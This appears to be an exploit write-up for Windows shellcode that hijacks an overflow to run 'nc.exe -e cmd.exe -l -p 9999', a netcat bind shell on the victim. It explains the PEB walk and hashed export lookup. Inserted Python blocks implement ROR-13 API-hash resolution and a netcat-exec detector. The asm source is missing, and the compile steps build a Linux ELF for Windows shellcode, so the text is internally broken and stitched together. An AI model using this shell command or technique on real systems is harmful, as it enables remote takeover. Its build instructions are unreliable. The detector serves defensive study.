shellcode to exploit the overflow vulnerability on windows to get remote code execution.

This shellcode exploits the overflow vulnerability on Windows to get remote code execution. It performs the following tasks:

1. Find the base address of kernel32.dll through the Process Environment Block (PEB). The PEB address can be read from fs:[0x30], and kernel32.dll is always the second module to be initialized, so walking the PEB's module list from there yields the base address of kernel32.dll.

(Figure: Debugging and finding the constants' addresses from the stack and Process A)

2. Next, the shellcode uses the Export Directory Table (EDT) of kernel32.dll to find the Relative Virtual Address (RVA) of each function it needs. Because the shellcode carries a hash of each function name, it can walk the EDT's name table, match the hash, and read the function's RVA; adding that RVA to the base address of kernel32.dll gives the function's absolute address.

3. Finally, with the addresses of these functions known, the shellcode calls them with its own arguments to carry out the exploit. It uses the CreateProcessA function to run "nc.exe -e cmd.exe -l -p 9999", which gives access to the command line (DOS prompt) of the victim. (Assume that netcat is already present on the target.)
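The export-table lookup in steps 2 and 3, as an added example that is not part of the original write-up or its shellcode: a small Python walk over a PE32 export directory, the three arrays it indexes (AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions), and a name hash. The DLL image is constructed in memory, so its export names and RVAs are made up, and the ROR-13 hash is an assumption, since the write-up does not say which hash its shellcode uses. The `hash_table` function is the defender's side of the same mechanism: the table an analyst builds to label the hash constants found in a shellcode sample.

```python
"""Added example: walk a PE32 export directory table (EDT) and resolve
API-name hashes.  The 'DLL' is constructed in memory so this runs offline;
ROR-13 is one common hash choice (an assumption, not taken from the page)."""
import struct

SECT_RVA, SECT_RAW = 0x1000, 0x200        # single section: RVA and file offset


def build_sample_dll(exports):
    """Constructed PE32 image exporting `exports` (name -> fake code RVA).
    Only the fields an export walk reads are filled in; the rest is zero."""
    names = sorted(exports)                # AddressOfNames is sorted by name
    func_order = list(exports)             # AddressOfFunctions is in ordinal order
    n = len(names)
    off_funcs, off_names = 40, 40 + 4 * n
    off_ords, off_strs = off_names + 4 * n, off_names + 6 * n
    strings, name_rvas = b"", []
    for nm in names:
        name_rvas.append(SECT_RVA + off_strs + len(strings))
        strings += nm.encode() + b"\0"
    directory = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, 0, 1, n, n,
                            SECT_RVA + off_funcs, SECT_RVA + off_names,
                            SECT_RVA + off_ords)
    section = (directory
               + b"".join(struct.pack("<I", exports[nm]) for nm in func_order)
               + b"".join(struct.pack("<I", r) for r in name_rvas)
               + b"".join(struct.pack("<H", func_order.index(nm)) for nm in names)
               + strings)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)                                         # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96, SECT_RVA, len(section))     # DataDirectory[0] = export
    sect_hdr = struct.pack("<8sIIII", b".edata", len(section), SECT_RVA,
                           len(section), SECT_RAW) + b"\0" * 16
    headers = dos + coff + bytes(opt) + sect_hdr
    return headers + b"\0" * (SECT_RAW - len(headers)) + section


def _rva_to_offset(pe, rva):
    """Map an RVA to a file offset via the section table.  Shellcode skips this:
    in a mapped image, base + RVA is already the right address."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    nsect = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    first = e_lfanew + 24 + opt_size
    for i in range(nsect):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", pe, first + 40 * i + 8)
        if vaddr <= rva < vaddr + max(vsize, rawsize):
            return rva - vaddr + rawptr
    raise ValueError(f"RVA {rva:#x} is outside every section")


def _cstr(pe, off):
    return pe[off:pe.index(b"\0", off)].decode("ascii")


def parse_exports(pe):
    """Return {export name: function RVA}, following the same three arrays the
    shellcode walks: AddressOfNames -> AddressOfNameOrdinals -> AddressOfFunctions."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    export_rva = struct.unpack_from("<I", pe, e_lfanew + 24 + 96)[0]  # DataDirectory[0]
    if export_rva == 0:
        return {}
    d = _rva_to_offset(pe, export_rva)
    _base, _nfuncs, nnames, aof, aon, aono = struct.unpack_from("<IIIIII", pe, d + 16)
    funcs, names, ords = (_rva_to_offset(pe, r) for r in (aof, aon, aono))
    result = {}
    for i in range(nnames):
        name_rva = struct.unpack_from("<I", pe, names + 4 * i)[0]
        ordinal_index = struct.unpack_from("<H", pe, ords + 2 * i)[0]
        func_rva = struct.unpack_from("<I", pe, funcs + 4 * ordinal_index)[0]
        result[_cstr(pe, _rva_to_offset(pe, name_rva))] = func_rva
    return result


def ror13_hash(name):
    """ROR-13 rolling hash over the ASCII name, 32-bit arithmetic (assumed variant)."""
    h = 0
    for c in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h


def hash_table(pe):
    """hash -> name for every export: what an analyst builds to label the
    hash constants found in a shellcode sample."""
    return {ror13_hash(n): n for n in parse_exports(pe)}


def resolve(pe, base, h):
    """(name, absolute address) of the export whose name hashes to `h`, given
    the module base from the PEB walk; None if no export matches."""
    name = hash_table(pe).get(h)
    return None if name is None else (name, base + parse_exports(pe)[name])


if __name__ == "__main__":
    dll = build_sample_dll({"ExitProcess": 0x2200, "CreateProcessA": 0x1F40, "WinExec": 0x2A10})
    for h, name in sorted(hash_table(dll).items()):
        print(f"{h:#010x}  {name}")
    print(resolve(dll, 0x7C800000, ror13_hash("CreateProcessA")))
```

The builder deliberately stores AddressOfFunctions in a different order from the sorted name table, so the ordinal indirection in `parse_exports` is exercised rather than being an identity mapping; a real kernel32.dll has the same shape, only with thousands of names and forwarded exports whose "RVA" points back inside the export directory.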

API Description
– CreateProcess function: used to create a new process and its primary thread. The new process runs in the security context of the calling process.

The prototype is:

    BOOL WINAPI CreateProcess(
        _In_opt_    LPCTSTR               lpApplicationName,
        _Inout_opt_ LPTSTR                lpCommandLine,
        _In_opt_    LPSECURITY_ATTRIBUTES lpProcessAttributes,
        _In_opt_    LPSECURITY_ATTRIBUTES lpThreadAttributes,
        _In_        BOOL                  bInheritHandles,
        _In_        DWORD                 dwCreationFlags,
        _In_opt_    LPVOID                lpEnvironment,
        _In_opt_    LPCTSTR               lpCurrentDirectory,
        _In_        LPSTARTUPINFO         lpStartupInfo,
        _Out_       LPPROCESS_INFORMATION lpProcessInformation
    );

Parameters:

– lpApplicationName: the name of the module to be executed.
– lpCommandLine: the command line to be executed. In my shellcode, I put "nc.exe -e cmd.exe -l -p 9999" in this parameter.
– lpProcessAttributes: a pointer to a SECURITY_ATTRIBUTES structure that determines whether the returned handle to the new process object can be inherited by child processes.
– lpThreadAttributes: a pointer to a SECURITY_ATTRIBUTES structure that determines whether the returned handle to the new thread object can be inherited by child processes.
– bInheritHandles: if this parameter is TRUE, each inheritable handle in the calling process is inherited by the new process. If the parameter is FALSE, the handles are not inherited.
– dwCreationFlags: controls the priority class and the creation of the process.
– lpEnvironment: a pointer to the environment block for the new process. If this parameter is NULL, the new process uses the environment of the calling process.
– lpCurrentDirectory: the full path to the current directory for the process.
– lpStartupInfo: a pointer to a STARTUPINFO or STARTUPINFOEX structure.
– lpProcessInformation: a pointer to a PROCESS_INFORMATION structure that receives identification information about the new process.
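A detection check for the process creation that this CreateProcessA call produces, added here as an example and not part of the original write-up: it parses process-creation records for a netcat binary launched with an exec switch (-e/-c) and, as in the command line above, a listening port. The records are constructed, and their field names (pid, image, parent_image, command_line) are an assumption rather than a real log schema.

```python
"""Added example: flag process-creation records where a netcat binary is
launched with an exec switch (-e/-c), the pattern the CreateProcessA call
above produces.  Records are constructed; their field names are an assumption."""
import ntpath
import re

NETCAT_IMAGES = {"nc.exe", "nc64.exe", "ncat.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "pwsh.exe", "sh", "bash"}

# Constructed records (not real telemetry); the shape is an assumption.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\app\server.exe",
     "image": r"C:\tools\nc.exe", "command_line": "nc.exe -e cmd.exe -l -p 9999"},
    {"pid": 4121, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\tools\nc.exe", "command_line": "nc.exe -zv 10.0.0.5 80"},
    {"pid": 4122, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
    {"pid": 4123, "parent_image": r"C:\app\server.exe",
     "image": r"C:\tools\ncat.exe",
     "command_line": '"C:\\tools\\ncat.exe" -lvp 4444 -c "powershell.exe -nop"'},
]


def split_command_line(cmd):
    """Split a Windows command line on whitespace, keeping quoted groups together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def analyse_command_line(cmd):
    """Return a finding if `cmd` runs a netcat binary that hands a program to
    the socket (-e/-c); None otherwise.  Handles combined switches such as -lvp."""
    argv = split_command_line(cmd)
    if not argv or ntpath.basename(argv[0]).lower() not in NETCAT_IMAGES:
        return None
    finding = {"exec": None, "listen": False, "port": None}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and tok[1:].isalpha():
            for letter in tok[1:].lower():
                if letter == "l":
                    finding["listen"] = True
                elif letter == "p" and i + 1 < len(argv):
                    i += 1
                    finding["port"] = int(argv[i]) if argv[i].isdigit() else argv[i]
                elif letter in "ec" and i + 1 < len(argv):
                    i += 1
                    finding["exec"] = argv[i]
        i += 1
    if finding["exec"] is None:
        return None        # port scan, file transfer etc.: not the exec pattern
    program = ntpath.basename(split_command_line(finding["exec"])[0]).lower()
    finding["severity"] = "high" if program in SHELLS else "medium"
    return finding


def scan_events(events):
    """Findings for every record whose command line matches.  The parent image
    is kept: a shell spawned by a network-facing service is the exploit's own
    fingerprint, whereas the same command typed by a user is a different story."""
    findings = []
    for ev in events:
        f = analyse_command_line(ev["command_line"])
        if f:
            findings.append({"pid": ev["pid"], "parent_image": ev["parent_image"],
                             "image": ev["image"], **f})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f)
```

Matching on the exec switch rather than on the netcat image name alone keeps ordinary port scans and file transfers out of the alert queue; the listening port and the parent image are carried along so an analyst can pivot to the network connection and the service that was overflowed.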

– ExitProcess function: used to end the calling process and all of its threads.

The prototype is:

    VOID WINAPI ExitProcess(
        _In_ UINT uExitCode
    );

Parameter: uExitCode is the exit code for the process and all of its threads. It is usually set to 0.

Compile:

– nasm -f elf -o myshellcode.o myshellcode.asm
– ld -o myshellcode myshellcode.o
– ./myshellcode (your victim machine)

myshellcode.asm Script:

Source : https://github.com/bbterry